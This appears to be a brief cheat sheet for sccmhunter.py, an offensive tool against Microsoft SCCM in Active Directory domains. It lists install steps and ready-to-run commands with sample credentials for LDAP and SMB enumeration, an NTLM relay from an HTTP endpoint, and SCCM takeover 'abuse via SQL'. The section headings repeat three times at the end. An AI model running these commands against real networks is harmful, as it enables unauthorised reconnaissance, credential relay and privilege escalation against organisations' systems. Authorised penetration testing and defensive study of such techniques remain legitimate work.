sccmhunter.py

A rad tool for hunting SCCM!

Install

git clone https://github.com/garrettfoster13/sccmhunter.git
cd sccmhunter
virtualenv --python=python3 .
source bin/activate
pip3 install -r requirements.txt
python3 sccmhunter.py -h

Enumerate SCCM config, enumerate remote hosts SMB shares, signing status, and SQL service status

sccmhunter.py find -u lowpriv -p 'JingleAllTheWay!' -d schwarzenegger.com -dc-ip 10.0.5.5

Enumerate SMB shares

Not 100% sure this gives you anything that "find" doesn't, but the instructions say this profiles and enumerates SMB shares of discovered SCCM servers, where as the find command "Enumerates LDAP and SCCM assets."

sccmhunter.py smb -u lowpriv -p pass -d domain.com -dc-ip 1.2.3.4

View all the enumeration info you have after doing the "find" command

sccmhunter.py show -all

Relay from an HTTP endpoint

sccmhunter.py http -u lowpriv -p 'JingleAllTheWay!' -d schwarzenegger.com -dc-ip 10.0.5.5 -ldaps -auto

Abuse via SQL

sccmhunter.py mssql -u lowpriv -p 'JingleAllTheWay!' -d schwarzenegger.com -dc-ip 10.0.5.5 -tu lowpriv -sc SITECODE

Install

Enumerate SCCM config, enumerate remote hosts SMB shares, signing status, and SQL service status​

Enumerate SMB shares​

View all the enumeration info you have after doing the "find" command​

Relay from an HTTP endpoint​

Abuse via SQL​

Enumerate SCCM config, enumerate remote hosts SMB shares, signing status, and SQL service status

Enumerate SMB shares

View all the enumeration info you have after doing the "find" command

Relay from an HTTP endpoint

Abuse via SQL